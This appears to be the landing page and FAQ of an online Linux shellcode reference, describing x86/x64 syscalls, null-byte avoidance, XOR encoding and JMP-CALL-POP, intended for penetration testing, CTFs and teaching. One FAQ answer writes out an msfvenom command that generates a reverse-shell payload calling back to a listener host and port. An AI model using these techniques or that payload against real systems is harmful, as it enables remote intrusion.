liminfo

Shellcode Reference

Free reference guide: Shellcode Reference

26 results

About Shellcode Reference

The Shellcode Reference is a searchable cheat sheet for security researchers and penetration testers covering Linux shellcode development across six categories: x86 (xor eax, push/pop, int 0x80, cdq), x64 (syscall instruction, RIP-relative addressing, register conventions), Encoding (XOR encoder, msfvenom shikata_ga_nai, Base64 loader), Null-Free techniques (JMP-CALL-POP, stack-based strings), Syscalls (execve, socket, dup2, write), and Linux tools (gcc, nasm, objdump, test harness).

Each entry shows the assembly syntax, a description of its purpose in shellcode development, and working code examples. The x86 section demonstrates null-byte avoidance using xor register clearing and lower-byte mov operations. The x64 section covers the syscall instruction with the rax/rdi/rsi/rdx register convention for Linux 64-bit system calls.

This reference is intended for authorized security testing, CTF competitions, exploit development education, and binary analysis research. All content is rendered locally in your browser. No code is executed on any server, and no network requests are made after the initial page load.

Key Features

  • x86 shellcode fundamentals: xor register clearing, push/pop stack manipulation, int 0x80 syscall, cdq sign extension
  • x64 shellcode: syscall instruction, RIP-relative addressing, complete execve /bin/sh shellcode, and register conventions
  • Encoding techniques: XOR encoder with decoder stub, msfvenom shikata_ga_nai, custom Python XOR encoder, Base64 shellcode loader
  • Null-free methods: JMP-CALL-POP string reference, stack-based string construction, lower-byte mov for null avoidance
  • Linux syscall reference: execve (11), socket (359), dup2 (63), write (4) with full assembly examples
  • Development tools: gcc -z execstack compilation, NASM elf32 assembly, objdump disassembly, C test harness template
  • msfvenom payload generation with bad character filtering (-b "\x00") and output format options
  • Searchable across all 6 categories with syntax highlighting and dark mode support

Frequently Asked Questions

Why do shellcodes avoid null bytes?

Null bytes (0x00) are string terminators in C. Functions like strcpy() stop copying at the first null byte, which would truncate the shellcode. Techniques to avoid nulls include using "xor eax, eax" instead of "mov eax, 0", using lower-byte registers like "mov al, 0x0b" instead of "mov eax, 0x0b", and constructing strings on the stack with push instructions.

What is the JMP-CALL-POP technique?

JMP-CALL-POP is a position-independent method to obtain the address of embedded data (like a "/bin/sh" string) in shellcode. A JMP skips over the shellcode to a CALL instruction, which pushes the return address (pointing to the string) onto the stack. The shellcode then POPs this address into a register. This avoids hardcoded absolute addresses.

What is the difference between x86 and x64 shellcode?

x86 shellcode uses int 0x80 for syscalls with arguments in eax (syscall number), ebx, ecx, edx. x64 shellcode uses the syscall instruction with arguments in rax, rdi, rsi, rdx, r10, r8, r9. x64 also supports RIP-relative addressing for position-independent data access and has different syscall numbers (e.g., execve is 11 on x86, 59 on x64).

How does XOR encoding work for shellcode?

XOR encoding encrypts each shellcode byte with a key (e.g., 0xAA) to eliminate bad characters. A small decoder stub prepended to the shellcode XORs each byte back to the original value at runtime. The decoder iterates through the encoded bytes using a loop, XORing each with the key. The key must not produce null bytes when applied to any shellcode byte.

How do I compile and test shellcode on Linux?

Write assembly in NASM syntax, compile with "nasm -f elf32 shellcode.asm -o shellcode.o", link with "ld -m elf_i386 shellcode.o -o shellcode". Extract raw bytes with objdump. To test, embed the bytes in a C program (unsigned char code[] = "...") compiled with "gcc -z execstack -fno-stack-protector -o test test.c" and run it.

What syscalls are commonly used in Linux shellcode?

The most common syscalls are: execve (x86: 11, x64: 59) to spawn a shell, socket (x86: 102/socketcall) to create network connections, dup2 (x86: 63) to redirect file descriptors for reverse shells, write (x86: 4) for output, and read (x86: 3) for input. Bind shells additionally use bind, listen, and accept syscalls.

How do I generate shellcode with msfvenom?

Use msfvenom with the desired payload, target, and output format: "msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f c -b \"\x00\"". The -b flag filters bad characters, -f specifies output format (c, python, raw, elf), and -e selects an encoder like x86/shikata_ga_nai. Use -i for multiple encoding iterations.

Is this shellcode reference intended for malicious use?

No. This reference is designed for authorized security testing, CTF competitions, academic exploit development courses, and binary analysis research. All techniques documented here are publicly available in security textbooks and training materials. Users are responsible for ensuring they have proper authorization before testing any exploit code on systems they do not own.